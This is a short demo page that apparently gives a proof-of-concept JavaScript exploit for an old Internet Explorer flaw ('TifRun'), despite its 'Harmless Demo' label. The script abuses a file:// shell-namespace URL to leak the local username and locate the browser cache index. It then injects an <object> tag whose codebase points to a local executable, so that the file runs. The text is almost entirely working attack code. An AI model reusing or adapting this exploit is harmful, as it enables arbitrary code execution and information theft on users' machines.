Demo: Downloading and implementing arbitrary files (TifRun)
Harmless Demo
alert("alert from MY Computer"); a=window.open("file:///::%7B450D8FBA-AD25-11D0-98A8-0800361B1103%7D/YouHaveBeenHacked/NoSuchFile.txt","","left=99999"); Tifloc=a.location.href; a.close(); startS=Tifloc.indexOf("Settings")+9; endS= Tifloc.indexOf("My")-1; User1=Tifloc.substring(startS,endS); alert(User1); winnt = "C:/Docume~1/"+User1+"/LocalS~1/Tempor~1/Content.IE5/index.dat"
alert('code2:try to guess location of exe'); //opps.exe
md="<object id=\"oFile\""+ "classid=\"clsid:11111111-1111-1111-1111-111111111111\""+ " codebase=\"c:/windows/temp/fire.exe\"></object>"; w=createPopup(); w.document.clear(); w.document.write(md);
